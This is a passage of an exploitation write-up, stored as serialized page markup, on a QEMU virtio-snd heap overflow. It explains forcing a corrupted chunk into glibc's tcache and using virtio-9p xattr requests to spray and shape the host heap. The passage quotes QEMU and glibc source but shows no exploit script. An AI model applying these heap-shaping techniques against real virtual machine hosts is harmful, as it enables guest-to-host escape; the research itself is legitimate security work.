[...]\n",[134706],{"type":27,"tag":84,"props":134707,"children":134708},{"__ignoreMap":7},[134709,134716,134743,134750,134757,134764,134783,134790,134809,134816,134843,134866,134873,134899,134906,134917,134974],{"type":27,"tag":207,"props":134710,"children":134711},{"class":209,"line":210},[134712],{"type":27,"tag":207,"props":134713,"children":134714},{"style":214},[134715],{"type":33,"value":134410},{"type":27,"tag":207,"props":134717,"children":134718},{"class":209,"line":244},[134719,134723,134727,134731,134735,134739],{"type":27,"tag":207,"props":134720,"children":134721},{"style":1335},[134722],{"type":33,"value":133677},{"type":27,"tag":207,"props":134724,"children":134725},{"style":238},[134726],{"type":33,"value":686},{"type":27,"tag":207,"props":134728,"children":134729},{"style":214},[134730],{"type":33,"value":58863},{"type":27,"tag":207,"props":134732,"children":134733},{"style":226},[134734],{"type":33,"value":17093},{"type":27,"tag":207,"props":134736,"children":134737},{"style":220},[134738],{"type":33,"value":47909},{"type":27,"tag":207,"props":134740,"children":134741},{"style":238},[134742],{"type":33,"value":10449},{"type":27,"tag":207,"props":134744,"children":134745},{"class":209,"line":270},[134746],{"type":27,"tag":207,"props":134747,"children":134748},{"style":238},[134749],{"type":33,"value":18158},{"type":27,"tag":207,"props":134751,"children":134752},{"class":209,"line":296},[134753],{"type":27,"tag":207,"props":134754,"children":134755},{"style":238},[134756],{"type":33,"value":133720},{"type":27,"tag":207,"props":134758,"children":134759},{"class":209,"line":445},[134760],{"type":27,"tag":207,"props":134761,"children":134762},{"emptyLinePlaceholder":19},[134763],{"type":33,"value":2062},{"type":27,"tag":207,"props":134765,"children":134766},{"class":209,"line":867},[134767,134771,134775,134779],{"type":27,"tag":207,"props":134768,"children":134769},{"style":238},[134770],{"type":33,"value":133735},{"type":27,"tag":207,"props":134772,"children":134773},{"style":226},[134774],{"type":33,"value":10380},{"type":27,"tag":207,"props":134776,"children":134777},{"style":1335},[134778],{"type":33,"value":133744},{"type":27,"tag":207,"props":134780,"children":134781},{"style":238},[134782],{"type":33,"value":133749},{"type":27,"tag":207,"props":134784,"children":134785},{"class":209,"line":892},[134786],{"type":27,"tag":207,"props":134787,"children":134788},{"emptyLinePlaceholder":19},[134789],{"type":33,"value":2062},{"type":27,"tag":207,"props":134791,"children":134792},{"class":209,"line":1475},[134793,134797,134801,134805],{"type":27,"tag":207,"props":134794,"children":134795},{"style":238},[134796],{"type":33,"value":134492},{"type":27,"tag":207,"props":134798,"children":134799},{"style":226},[134800],{"type":33,"value":10380},{"type":27,"tag":207,"props":134802,"children":134803},{"style":1335},[134804],{"type":33,"value":134071},{"type":27,"tag":207,"props":134806,"children":134807},{"style":238},[134808],{"type":33,"value":133790},{"type":27,"tag":207,"props":134810,"children":134811},{"class":209,"line":2065},[134812],{"type":27,"tag":207,"props":134813,"children":134814},{"emptyLinePlaceholder":19},[134815],{"type":33,"value":2062},{"type":27,"tag":207,"props":134817,"children":134818},{"class":209,"line":2092},[134819,134823,134827,134831,134835,134839],{"type":27,"tag":207,"props":134820,"children":134821},{"style":376},[134822],{"type":33,"value":38654},{"type":27,"tag":207,"props":134824,"children":134825},{"style":238},[134826],{"type":33,"value":686},{"type":27,"tag":207,"props":134828,"children":134829},{"style":1335},[134830],{"type":33,"value":134266},{"type":27,"tag":207,"props":134832,"children":134833},{"style":238},[134834],{"type":33,"value":686},{"type":27,"tag":207,"props":134836,"children":134837},{"style":1335},[134838],{"type":33,"value":134200},{"type":27,"tag":207,"props":134840,"children":134841},{"style":238},[134842],{"type":33,"value":134539},{"type":27,"tag":207,"props":134844,"children":134845},{"class":209,"line":2130},[134846,134850,134854,134858,134862],{"type":27,"tag":207,"props":134847,"children":134848},{"style":376},[134849],{"type":33,"value":8986},{"type":27,"tag":207,"props":134851,"children":134852},{"style":1335},[134853],{"type":33,"value":134551},{"type":27,"tag":207,"props":134855,"children":134856},{"style":238},[134857],{"type":33,"value":686},{"type":27,"tag":207,"props":134859,"children":134860},{"style":1325},[134861],{"type":33,"value":134230},{"type":27,"tag":207,"props":134863,"children":134864},{"style":238},[134865],{"type":33,"value":1455},{"type":27,"tag":207,"props":134867,"children":134868},{"class":209,"line":2168},[134869],{"type":27,"tag":207,"props":134870,"children":134871},{"emptyLinePlaceholder":19},[134872],{"type":33,"value":2062},{"type":27,"tag":207,"props":134874,"children":134875},{"class":209,"line":4095},[134876,134880,134884,134889,134894],{"type":27,"tag":207,"props":134877,"children":134878},{"style":1335},[134879],{"type":33,"value":134333},{"type":27,"tag":207,"props":134881,"children":134882},{"style":238},[134883],{"type":33,"value":686},{"type":27,"tag":207,"props":134885,"children":134886},{"style":1335},[134887],{"type":33,"value":134888},"arena_for_chunk",{"type":27,"tag":207,"props":134890,"children":134891},{"style":238},[134892],{"type":33,"value":134893}," (p), p);",{"type":27,"tag":207,"props":134895,"children":134896},{"style":4647},[134897],{"type":33,"value":134898}," // [1]\n",{"type":27,"tag":207,"props":134900,"children":134901},{"class":209,"line":4103},[134902],{"type":27,"tag":207,"props":134903,"children":134904},{"emptyLinePlaceholder":19},[134905],{"type":33,"value":2062},{"type":27,"tag":207,"props":134907,"children":134908},{"class":209,"line":4154},[134909,134913],{"type":27,"tag":207,"props":134910,"children":134911},{"style":376},[134912],{"type":33,"value":134578},{"type":27,"tag":207,"props":134914,"children":134915},{"style":1335},[134916],{"type":33,"value":134583},{"type":27,"tag":207,"props":134918,"children":134919},{"class":209,"line":4203},[134920,134924,134928,134932,134936,134940,134944,134948,134952,134956,134961,134965,134970],{"type":27,"tag":207,"props":134921,"children":134922},{"style":376},[134923],{"type":33,"value":38654},{"type":27,"tag":207,"props":134925,"children":134926},{"style":238},[134927],{"type":33,"value":686},{"type":27,"tag":207,"props":134929,"children":134930},{"style":1335},[134931],{"type":33,"value":134599},{"type":27,"tag":207,"props":134933,"children":134934},{"style":238},[134935],{"type":33,"value":134271},{"type":27,"tag":207,"props":134937,"children":134938},{"style":226},[134939],{"type":33,"value":9257},{"type":27,"tag":207,"props":134941,"children":134942},{"style":220},[134943],{"type":33,"value":134612},{"type":27,"tag":207,"props":134945,"children":134946},{"style":238},[134947],{"type":33,"value":1041},{"type":27,"tag":207,"props":134949,"children":134950},{"style":220},[134951],{"type":33,"value":134621},{"type":27,"tag":207,"props":134953,"children":134954},{"style":226},[134955],{"type":33,"value":21461},{"type":27,"tag":207,"props":134957,"children":134958},{"style":238},[134959],{"type":33,"value":134960}," tcache ",{"type":27,"tag":207,"props":134962,"children":134963},{"style":226},[134964],{"type":33,"value":22963},{"type":27,"tag":207,"props":134966,"children":134967},{"style":214},[134968],{"type":33,"value":134969}," NULL",{"type":27,"tag":207,"props":134971,"children":134972},{"style":238},[134973],{"type":33,"value":26983},{"type":27,"tag":207,"props":134975,"children":134976},{"class":209,"line":4249},[134977],{"type":27,"tag":207,"props":134978,"children":134979},{"style":238},[134980],{"type":33,"value":8902},{"type":27,"tag":36,"props":134982,"children":134983},{},[134984,134986,134991],{"type":33,"value":134985},"This means that as long as we can reliably force the corrupted chunk down the tcache path, we no longer need to worry much about integrity checks on ",{"type":27,"tag":84,"props":134987,"children":134989},{"className":134988},[],[134990],{"type":33,"value":131462},{"type":33,"value":134992},", because on the latest 2.43 glibc they are non-existent.",{"type":27,"tag":26063,"props":134994,"children":134995},{},[],{"type":27,"tag":36,"props":134997,"children":134998},{},[134999,135001,135006,135008,135014,135016,135021,135023,135029],{"type":33,"value":135000},"With that in mind, the idea we settled on was to allocate a chunk whose ",{"type":27,"tag":84,"props":135002,"children":135004},{"className":135003},[],[135005],{"type":33,"value":131462},{"type":33,"value":135007}," field was initially ",{"type":27,"tag":84,"props":135009,"children":135011},{"className":135010},[],[135012],{"type":33,"value":135013},"0x200",{"type":33,"value":135015},", then trigger the overflow and corrupt only its low byte. If the byte written is at least ",{"type":27,"tag":84,"props":135017,"children":135019},{"className":135018},[],[135020],{"type":33,"value":133637},{"type":33,"value":135022},", the resulting value would correspond to a larger, tcache-eligible, size in range ",{"type":27,"tag":84,"props":135024,"children":135026},{"className":135025},[],[135027],{"type":33,"value":135028},"[0x210, 0x2f0]",{"type":33,"value":135030},". That would let us free the chunk as an oversized entry into the tcache freelist, which we could later reclaim and overlap chunks for a better primitive.",{"type":27,"tag":36,"props":135032,"children":135033},{},[135034],{"type":33,"value":135035},"This approach gives us much better odds of success. In fact, with the stream configuration we use later, we can make this behavior reliable enough to exploit consistently.",{"type":27,"tag":58,"props":135037,"children":135039},{"id":135038},"heap-spraying",[135040],{"type":33,"value":135041},"Heap Spraying",{"type":27,"tag":36,"props":135043,"children":135044},{},[135045,135047,135052],{"type":33,"value":135046},"With that idea in mind, we now need a way to shape the heap so that a ",{"type":27,"tag":84,"props":135048,"children":135050},{"className":135049},[],[135051],{"type":33,"value":135013},{"type":33,"value":135053},"-sized chunk is placed immediately after the vulnerable virtio-snd buffer. In addition, we need to drain any existing entries from the relevant tcache freelist so that it is not full when we later free the corrupted oversized chunk.",{"type":27,"tag":36,"props":135055,"children":135056},{},[135057,135059,135064],{"type":33,"value":135058},"Unfortunately, while virtio-snd does provide some heap spraying primitives through its buffer allocations, they are fairly limited. For example, we could only allocate up to 64 buffers at a time. On top of that, ",{"type":27,"tag":84,"props":135060,"children":135062},{"className":135061},[],[135063],{"type":33,"value":131657},{"type":33,"value":135065}," is a FIFO queue, so we could not control the order in which those buffers were freed - they would always be released in the same order they were inserted.",{"type":27,"tag":36,"props":135067,"children":135068},{},[135069],{"type":33,"value":135070},"For the purposes of this blog post, we therefore enabled another virtio device to help with heap shaping.",{"type":27,"tag":26163,"props":135072,"children":135074},{"id":135073},"virtio-9p",[135075],{"type":33,"value":135073},{"type":27,"tag":36,"props":135077,"children":135078},{},[135079,135084],{"type":27,"tag":84,"props":135080,"children":135082},{"className":135081},[],[135083],{"type":33,"value":135073},{"type":33,"value":135085}," is a paravirtualized filesystem device that lets the guest access a directory exported by the host through the 9P protocol. The part that interested us most was its handling of extended attributes, or xattrs.",{"type":27,"tag":36,"props":135087,"children":135088},{},[135089,135091,135097,135099,135105,135106,135112,135114,135119],{"type":33,"value":135090},"Through a ",{"type":27,"tag":84,"props":135092,"children":135094},{"className":135093},[],[135095],{"type":33,"value":135096},"P9_TXATTRCREATE",{"type":33,"value":135098}," request, we can allocate host-side buffers for both the ",{"type":27,"tag":84,"props":135100,"children":135102},{"className":135101},[],[135103],{"type":33,"value":135104},".name",{"type":33,"value":1131},{"type":27,"tag":84,"props":135107,"children":135109},{"className":135108},[],[135110],{"type":33,"value":135111},".value",{"type":33,"value":135113}," fields, with the size of ",{"type":27,"tag":84,"props":135115,"children":135117},{"className":135116},[],[135118],{"type":33,"value":135111},{"type":33,"value":135120}," being directly controlled by the guest.",{"type":27,"tag":101,"props":135122,"children":135124},{"code":135123,"language":10435,"meta":7,"className":23789,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n int flags, rflags = 0;\n int32_t fid;\n uint64_t size;\n ssize_t err = 0;\n V9fsString name;\n size_t offset = 7;\n V9fsFidState *file_fidp;\n V9fsFidState *xattr_fidp;\n V9fsPDU *pdu = opaque;\n\n v9fs_string_init(&name);\n err = pdu_unmarshal(pdu, offset, \"dsqd\", &fid, &name, &size, &flags);\n if (err \u003C 0) {\n goto out_nofid;\n }\n\n [...]\n\n if (size > P9_XATTR_SIZE_MAX) {\n err = -E2BIG;\n goto out_nofid;\n }\n\n [...]\n\n v9fs_string_init(&xattr_fidp->fs.xattr.name);\n v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);\n xattr_fidp->fs.xattr.value = g_malloc0(size);\n}\n",[135125],{"type":27,"tag":84,"props":135126,"children":135127},{"__ignoreMap":7},[135128,135170,135177,135201,135214,135225,135250,135258,135283,135300,135316,135342,135349,135370,135436,135460,135473,135480,135487,135494,135501,135521,135542,135553,135560,135567,135574,135581,135630,135686,135731],{"type":27,"tag":207,"props":135129,"children":135130},{"class":209,"line":210},[135131,135135,135139,135144,135149,135153,135157,135161,135166],{"type":27,"tag":207,"props":135132,"children":135133},{"style":214},[135134],{"type":33,"value":58283},{"type":27,"tag":207,"props":135136,"children":135137},{"style":214},[135138],{"type":33,"value":58288},{"type":27,"tag":207,"props":135140,"children":135141},{"style":238},[135142],{"type":33,"value":135143}," coroutine_fn ",{"type":27,"tag":207,"props":135145,"children":135146},{"style":1335},[135147],{"type":33,"value":135148},"v9fs_xattrcreate",{"type":27,"tag":207,"props":135150,"children":135151},{"style":238},[135152],{"type":33,"value":1343},{"type":27,"tag":207,"props":135154,"children":135155},{"style":214},[135156],{"type":33,"value":58863},{"type":27,"tag":207,"props":135158,"children":135159},{"style":226},[135160],{"type":33,"value":17093},{"type":27,"tag":207,"props":135162,"children":135163},{"style":220},[135164],{"type":33,"value":135165},"opaque",{"type":27,"tag":207,"props":135167,"children":135168},{"style":238},[135169],{"type":33,"value":10449},{"type":27,"tag":207,"props":135171,"children":135172},{"class":209,"line":244},[135173],{"type":27,"tag":207,"props":135174,"children":135175},{"style":238},[135176],{"type":33,"value":18158},{"type":27,"tag":207,"props":135178,"children":135179},{"class":209,"line":270},[135180,135184,135189,135193,135197],{"type":27,"tag":207,"props":135181,"children":135182},{"style":214},[135183],{"type":33,"value":26347},{"type":27,"tag":207,"props":135185,"children":135186},{"style":238},[135187],{"type":33,"value":135188}," flags, rflags ",{"type":27,"tag":207,"props":135190,"children":135191},{"style":226},[135192],{"type":33,"value":10380},{"type":27,"tag":207,"props":135194,"children":135195},{"style":232},[135196],{"type":33,"value":4680},{"type":27,"tag":207,"props":135198,"children":135199},{"style":238},[135200],{"type":33,"value":241},{"type":27,"tag":207,"props":135202,"children":135203},{"class":209,"line":296},[135204,135209],{"type":27,"tag":207,"props":135205,"children":135206},{"style":214},[135207],{"type":33,"value":135208}," int32_t",{"type":27,"tag":207,"props":135210,"children":135211},{"style":238},[135212],{"type":33,"value":135213}," fid;\n",{"type":27,"tag":207,"props":135215,"children":135216},{"class":209,"line":445},[135217,135221],{"type":27,"tag":207,"props":135218,"children":135219},{"style":214},[135220],{"type":33,"value":62848},{"type":27,"tag":207,"props":135222,"children":135223},{"style":238},[135224],{"type":33,"value":131804},{"type":27,"tag":207,"props":135226,"children":135227},{"class":209,"line":867},[135228,135233,135238,135242,135246],{"type":27,"tag":207,"props":135229,"children":135230},{"style":214},[135231],{"type":33,"value":135232}," ssize_t",{"type":27,"tag":207,"props":135234,"children":135235},{"style":238},[135236],{"type":33,"value":135237}," err ",{"type":27,"tag":207,"props":135239,"children":135240},{"style":226},[135241],{"type":33,"value":10380},{"type":27,"tag":207,"props":135243,"children":135244},{"style":232},[135245],{"type":33,"value":4680},{"type":27,"tag":207,"props":135247,"children":135248},{"style":238},[135249],{"type":33,"value":241},{"type":27,"tag":207,"props":135251,"children":135252},{"class":209,"line":892},[135253],{"type":27,"tag":207,"props":135254,"children":135255},{"style":238},[135256],{"type":33,"value":135257}," V9fsString name;\n",{"type":27,"tag":207,"props":135259,"children":135260},{"class":209,"line":1475},[135261,135265,135270,135274,135279],{"type":27,"tag":207,"props":135262,"children":135263},{"style":214},[135264],{"type":33,"value":23839},{"type":27,"tag":207,"props":135266,"children":135267},{"style":238},[135268],{"type":33,"value":135269}," offset ",{"type":27,"tag":207,"props":135271,"children":135272},{"style":226},[135273],{"type":33,"value":10380},{"type":27,"tag":207,"props":135275,"children":135276},{"style":232},[135277],{"type":33,"value":135278}," 7",{"type":27,"tag":207,"props":135280,"children":135281},{"style":238},[135282],{"type":33,"value":241},{"type":27,"tag":207,"props":135284,"children":135285},{"class":209,"line":2065},[135286,135291,135295],{"type":27,"tag":207,"props":135287,"children":135288},{"style":238},[135289],{"type":33,"value":135290}," V9fsFidState ",{"type":27,"tag":207,"props":135292,"children":135293},{"style":226},[135294],{"type":33,"value":9286},{"type":27,"tag":207,"props":135296,"children":135297},{"style":238},[135298],{"type":33,"value":135299},"file_fidp;\n",{"type":27,"tag":207,"props":135301,"children":135302},{"class":209,"line":2092},[135303,135307,135311],{"type":27,"tag":207,"props":135304,"children":135305},{"style":238},[135306],{"type":33,"value":135290},{"type":27,"tag":207,"props":135308,"children":135309},{"style":226},[135310],{"type":33,"value":9286},{"type":27,"tag":207,"props":135312,"children":135313},{"style":238},[135314],{"type":33,"value":135315},"xattr_fidp;\n",{"type":27,"tag":207,"props":135317,"children":135318},{"class":209,"line":2130},[135319,135324,135328,135333,135337],{"type":27,"tag":207,"props":135320,"children":135321},{"style":238},[135322],{"type":33,"value":135323}," V9fsPDU ",{"type":27,"tag":207,"props":135325,"children":135326},{"style":226},[135327],{"type":33,"value":9286},{"type":27,"tag":207,"props":135329,"children":135330},{"style":238},[135331],{"type":33,"value":135332},"pdu ",{"type":27,"tag":207,"props":135334,"children":135335},{"style":226},[135336],{"type":33,"value":10380},{"type":27,"tag":207,"props":135338,"children":135339},{"style":238},[135340],{"type":33,"value":135341}," opaque;\n",{"type":27,"tag":207,"props":135343,"children":135344},{"class":209,"line":2168},[135345],{"type":27,"tag":207,"props":135346,"children":135347},{"emptyLinePlaceholder":19},[135348],{"type":33,"value":2062},{"type":27,"tag":207,"props":135350,"children":135351},{"class":209,"line":4095},[135352,135357,135361,135365],{"type":27,"tag":207,"props":135353,"children":135354},{"style":1335},[135355],{"type":33,"value":135356}," v9fs_string_init",{"type":27,"tag":207,"props":135358,"children":135359},{"style":238},[135360],{"type":33,"value":1343},{"type":27,"tag":207,"props":135362,"children":135363},{"style":226},[135364],{"type":33,"value":10398},{"type":27,"tag":207,"props":135366,"children":135367},{"style":238},[135368],{"type":33,"value":135369},"name);\n",{"type":27,"tag":207,"props":135371,"children":135372},{"class":209,"line":4103},[135373,135378,135382,135387,135392,135397,135401,135405,135410,135414,135419,135423,135427,135431],{"type":27,"tag":207,"props":135374,"children":135375},{"style":238},[135376],{"type":33,"value":135377}," err ",{"type":27,"tag":207,"props":135379,"children":135380},{"style":226},[135381],{"type":33,"value":10380},{"type":27,"tag":207,"props":135383,"children":135384},{"style":1335},[135385],{"type":33,"value":135386}," pdu_unmarshal",{"type":27,"tag":207,"props":135388,"children":135389},{"style":238},[135390],{"type":33,"value":135391},"(pdu, offset, ",{"type":27,"tag":207,"props":135393,"children":135394},{"style":1325},[135395],{"type":33,"value":135396},"\"dsqd\"",{"type":27,"tag":207,"props":135398,"children":135399},{"style":238},[135400],{"type":33,"value":1123},{"type":27,"tag":207,"props":135402,"children":135403},{"style":226},[135404],{"type":33,"value":10398},{"type":27,"tag":207,"props":135406,"children":135407},{"style":238},[135408],{"type":33,"value":135409},"fid, ",{"type":27,"tag":207,"props":135411,"children":135412},{"style":226},[135413],{"type":33,"value":10398},{"type":27,"tag":207,"props":135415,"children":135416},{"style":238},[135417],{"type":33,"value":135418},"name, ",{"type":27,"tag":207,"props":135420,"children":135421},{"style":226},[135422],{"type":33,"value":10398},{"type":27,"tag":207,"props":135424,"children":135425},{"style":238},[135426],{"type":33,"value":134170},{"type":27,"tag":207,"props":135428,"children":135429},{"style":226},[135430],{"type":33,"value":10398},{"type":27,"tag":207,"props":135432,"children":135433},{"style":238},[135434],{"type":33,"value":135435},"flags);\n",{"type":27,"tag":207,"props":135437,"children":135438},{"class":209,"line":4154},[135439,135443,135448,135452,135456],{"type":27,"tag":207,"props":135440,"children":135441},{"style":376},[135442],{"type":33,"value":19556},{"type":27,"tag":207,"props":135444,"children":135445},{"style":238},[135446],{"type":33,"value":135447}," (err ",{"type":27,"tag":207,"props":135449,"children":135450},{"style":226},[135451],{"type":33,"value":9257},{"type":27,"tag":207,"props":135453,"children":135454},{"style":232},[135455],{"type":33,"value":4680},{"type":27,"tag":207,"props":135457,"children":135458},{"style":238},[135459],{"type":33,"value":1424},{"type":27,"tag":207,"props":135461,"children":135462},{"class":209,"line":4203},[135463,135468],{"type":27,"tag":207,"props":135464,"children":135465},{"style":376},[135466],{"type":33,"value":135467}," goto",{"type":27,"tag":207,"props":135469,"children":135470},{"style":238},[135471],{"type":33,"value":135472}," out_nofid;\n",{"type":27,"tag":207,"props":135474,"children":135475},{"class":209,"line":4249},[135476],{"type":27,"tag":207,"props":135477,"children":135478},{"style":238},[135479],{"type":33,"value":10645},{"type":27,"tag":207,"props":135481,"children":135482},{"class":209,"line":4290},[135483],{"type":27,"tag":207,"props":135484,"children":135485},{"emptyLinePlaceholder":19},[135486],{"type":33,"value":2062},{"type":27,"tag":207,"props":135488,"children":135489},{"class":209,"line":4304},[135490],{"type":27,"tag":207,"props":135491,"children":135492},{"style":238},[135493],{"type":33,"value":112006},{"type":27,"tag":207,"props":135495,"children":135496},{"class":209,"line":5466},[135497],{"type":27,"tag":207,"props":135498,"children":135499},{"emptyLinePlaceholder":19},[135500],{"type":33,"value":2062},{"type":27,"tag":207,"props":135502,"children":135503},{"class":209,"line":5530},[135504,135508,135512,135516],{"type":27,"tag":207,"props":135505,"children":135506},{"style":376},[135507],{"type":33,"value":19556},{"type":27,"tag":207,"props":135509,"children":135510},{"style":238},[135511],{"type":33,"value":134271},{"type":27,"tag":207,"props":135513,"children":135514},{"style":226},[135515],{"type":33,"value":17739},{"type":27,"tag":207,"props":135517,"children":135518},{"style":238},[135519],{"type":33,"value":135520}," P9_XATTR_SIZE_MAX) {\n",{"type":27,"tag":207,"props":135522,"children":135523},{"class":209,"line":7900},[135524,135529,135533,135537],{"type":27,"tag":207,"props":135525,"children":135526},{"style":238},[135527],{"type":33,"value":135528}," err ",{"type":27,"tag":207,"props":135530,"children":135531},{"style":226},[135532],{"type":33,"value":10380},{"type":27,"tag":207,"props":135534,"children":135535},{"style":226},[135536],{"type":33,"value":544},{"type":27,"tag":207,"props":135538,"children":135539},{"style":238},[135540],{"type":33,"value":135541},"E2BIG;\n",{"type":27,"tag":207,"props":135543,"children":135544},{"class":209,"line":7909},[135545,135549],{"type":27,"tag":207,"props":135546,"children":135547},{"style":376},[135548],{"type":33,"value":135467},{"type":27,"tag":207,"props":135550,"children":135551},{"style":238},[135552],{"type":33,"value":135472},{"type":27,"tag":207,"props":135554,"children":135555},{"class":209,"line":7917},[135556],{"type":27,"tag":207,"props":135557,"children":135558},{"style":238},[135559],{"type":33,"value":10645},{"type":27,"tag":207,"props":135561,"children":135562},{"class":209,"line":7926},[135563],{"type":27,"tag":207,"props":135564,"children":135565},{"emptyLinePlaceholder":19},[135566],{"type":33,"value":2062},{"type":27,"tag":207,"props":135568,"children":135569},{"class":209,"line":7934},[135570],{"type":27,"tag":207,"props":135571,"children":135572},{"style":238},[135573],{"type":33,"value":112006},{"type":27,"tag":207,"props":135575,"children":135576},{"class":209,"line":7943},[135577],{"type":27,"tag":207,"props":135578,"children":135579},{"emptyLinePlaceholder":19},[135580],{"type":33,"value":2062},{"type":27,"tag":207,"props":135582,"children":135583},{"class":209,"line":7952},[135584,135588,135592,135596,135601,135605,135609,135613,135618,135622,135626],{"type":27,"tag":207,"props":135585,"children":135586},{"style":1335},[135587],{"type":33,"value":135356},{"type":27,"tag":207,"props":135589,"children":135590},{"style":238},[135591],{"type":33,"value":1343},{"type":27,"tag":207,"props":135593,"children":135594},{"style":226},[135595],{"type":33,"value":10398},{"type":27,"tag":207,"props":135597,"children":135598},{"style":220},[135599],{"type":33,"value":135600},"xattr_fidp",{"type":27,"tag":207,"props":135602,"children":135603},{"style":238},[135604],{"type":33,"value":8968},{"type":27,"tag":207,"props":135606,"children":135607},{"style":220},[135608],{"type":33,"value":44232},{"type":27,"tag":207,"props":135610,"children":135611},{"style":238},[135612],{"type":33,"value":1041},{"type":27,"tag":207,"props":135614,"children":135615},{"style":220},[135616],{"type":33,"value":135617},"xattr",{"type":27,"tag":207,"props":135619,"children":135620},{"style":238},[135621],{"type":33,"value":1041},{"type":27,"tag":207,"props":135623,"children":135624},{"style":220},[135625],{"type":33,"value":55737},{"type":27,"tag":207,"props":135627,"children":135628},{"style":238},[135629],{"type":33,"value":1455},{"type":27,"tag":207,"props":135631,"children":135632},{"class":209,"line":7961},[135633,135638,135642,135646,135650,135654,135658,135662,135666,135670,135674,135678,135682],{"type":27,"tag":207,"props":135634,"children":135635},{"style":1335},[135636],{"type":33,"value":135637}," v9fs_string_copy",{"type":27,"tag":207,"props":135639,"children":135640},{"style":238},[135641],{"type":33,"value":1343},{"type":27,"tag":207,"props":135643,"children":135644},{"style":226},[135645],{"type":33,"value":10398},{"type":27,"tag":207,"props":135647,"children":135648},{"style":220},[135649],{"type":33,"value":135600},{"type":27,"tag":207,"props":135651,"children":135652},{"style":238},[135653],{"type":33,"value":8968},{"type":27,"tag":207,"props":135655,"children":135656},{"style":220},[135657],{"type":33,"value":44232},{"type":27,"tag":207,"props":135659,"children":135660},{"style":238},[135661],{"type":33,"value":1041},{"type":27,"tag":207,"props":135663,"children":135664},{"style":220},[135665],{"type":33,"value":135617},{"type":27,"tag":207,"props":135667,"children":135668},{"style":238},[135669],{"type":33,"value":1041},{"type":27,"tag":207,"props":135671,"children":135672},{"style":220},[135673],{"type":33,"value":55737},{"type":27,"tag":207,"props":135675,"children":135676},{"style":238},[135677],{"type":33,"value":1123},{"type":27,"tag":207,"props":135679,"children":135680},{"style":226},[135681],{"type":33,"value":10398},{"type":27,"tag":207,"props":135683,"children":135684},{"style":238},[135685],{"type":33,"value":135369},{"type":27,"tag":207,"props":135687,"children":135688},{"class":209,"line":7969},[135689,135694,135698,135702,135706,135710,135714,135718,135722,135726],{"type":27,"tag":207,"props":135690,"children":135691},{"style":220},[135692],{"type":33,"value":135693}," xattr_fidp",{"type":27,"tag":207,"props":135695,"children":135696},{"style":238},[135697],{"type":33,"value":8968},{"type":27,"tag":207,"props":135699,"children":135700},{"style":220},[135701],{"type":33,"value":44232},{"type":27,"tag":207,"props":135703,"children":135704},{"style":238},[135705],{"type":33,"value":1041},{"type":27,"tag":207,"props":135707,"children":135708},{"style":220},[135709],{"type":33,"value":135617},{"type":27,"tag":207,"props":135711,"children":135712},{"style":238},[135713],{"type":33,"value":1041},{"type":27,"tag":207,"props":135715,"children":135716},{"style":220},[135717],{"type":33,"value":4196},{"type":27,"tag":207,"props":135719,"children":135720},{"style":226},[135721],{"type":33,"value":229},{"type":27,"tag":207,"props":135723,"children":135724},{"style":1335},[135725],{"type":33,"value":131375},{"type":27,"tag":207,"props":135727,"children":135728},{"style":238},[135729],{"type":33,"value":135730},"(size);\n",{"type":27,"tag":207,"props":135732,"children":135733},{"class":209,"line":7978},[135734],{"type":27,"tag":207,"props":135735,"children":135736},{"style":238},[135737],{"type":33,"value":451},{"type":27,"tag":36,"props":135739,"children":135740},{},[135741,135743,135748,135750,135755,135756,135761,135763,135768],{"type":33,"value":135742},"Because the ",{"type":27,"tag":84,"props":135744,"children":135746},{"className":135745},[],[135747],{"type":33,"value":135104},{"type":33,"value":135749}," field is handled as a string, embedded null bytes are not preserved, which makes it less useful for our purposes. It also introduces some extra allocation noise into the heap, since creating an xattr allocates both ",{"type":27,"tag":84,"props":135751,"children":135753},{"className":135752},[],[135754],{"type":33,"value":135104},{"type":33,"value":1131},{"type":27,"tag":84,"props":135757,"children":135759},{"className":135758},[],[135760],{"type":33,"value":135111},{"type":33,"value":135762},", not just the ",{"type":27,"tag":84,"props":135764,"children":135766},{"className":135765},[],[135767],{"type":33,"value":135111},{"type":33,"value":135769}," we actually care about. But we will get around this later in the blog post.",{"type":27,"tag":36,"props":135771,"children":135772},{},[135773,135774,135779],{"type":33,"value":23888},{"type":27,"tag":84,"props":135775,"children":135777},{"className":135776},[],[135778],{"type":33,"value":135111},{"type":33,"value":135780}," field, however, is much more interesting: it gives us a guest-controlled heap allocation of an arbitrary size. Each of these allocations is tied to its own xattr FID, which means it stays alive for as long as that FID remains live. In practice, this gives us a large number of persistent host-side heap objects that we can manage individually.",{"type":27,"tag":36,"props":135782,"children":135783},{},[135784,135786,135791,135793,135799,135801,135807,135809,135815],{"type":33,"value":135785},"Once allocated, we can write arbitrary bytes into the ",{"type":27,"tag":84,"props":135787,"children":135789},{"className":135788},[],[135790],{"type":33,"value":135111},{"type":33,"value":135792}," buffer through a ",{"type":27,"tag":84,"props":135794,"children":135796},{"className":135795},[],[135797],{"type":33,"value":135798},"P9_TWRITE",{"type":33,"value":135800}," request on the corresponding xattr FID. We can also read the contents back with ",{"type":27,"tag":84,"props":135802,"children":135804},{"className":135803},[],[135805],{"type":33,"value":135806},"P9_TREAD",{"type":33,"value":135808},", which is useful later when turning overlap into stronger primitives. Finally, we can free any individual allocation at any time by issuing a ",{"type":27,"tag":84,"props":135810,"children":135812},{"className":135811},[],[135813],{"type":33,"value":135814},"P9_TCLUNK",{"type":33,"value":135816}," request on that same FID.",{"type":27,"tag":36,"props":135818,"children":135819},{},[135820,135822,135828],{"type":33,"value":135821},"This gives us a very strong heap shaping primitive in QEMU - allocate on demand, choose the size precisely (up to ",{"type":27,"tag":84,"props":135823,"children":135825},{"className":135824},[],[135826],{"type":33,"value":135827},"65536",{"type":33,"value":135829}," bytes, which is more than enough here), fully control the contents of the allocation, keep it alive as long as needed, and free it selectively later.",{"type":27,"tag":58,"props":135831,"children":135833},{"id":135832},"setting-the-heap-layout",[135834],{"type":33,"value":135835},"Setting the Heap Layout",{"type":27,"tag":36,"props":135837,"children":135838},{},[135839,135841,135846],{"type":33,"value":135840},"Ideally, we want a contiguous heap region consisting only of ",{"type":27,"tag":84,"props":135842,"children":135844},{"className":135843},[],[135845],{"type":33,"value":135111},{"type":33,"value":135847}," allocations, like this:",{"type":27,"tag":101,"props":135849,"children":135851},{"code":135850}," 0x200 0x200 0x200 0x200 0x200\n+----------+----------+----------+----------+----------+\n| | | | | |\n| .value A | .value B | .value C | .value D | .value E |\n| | | | | 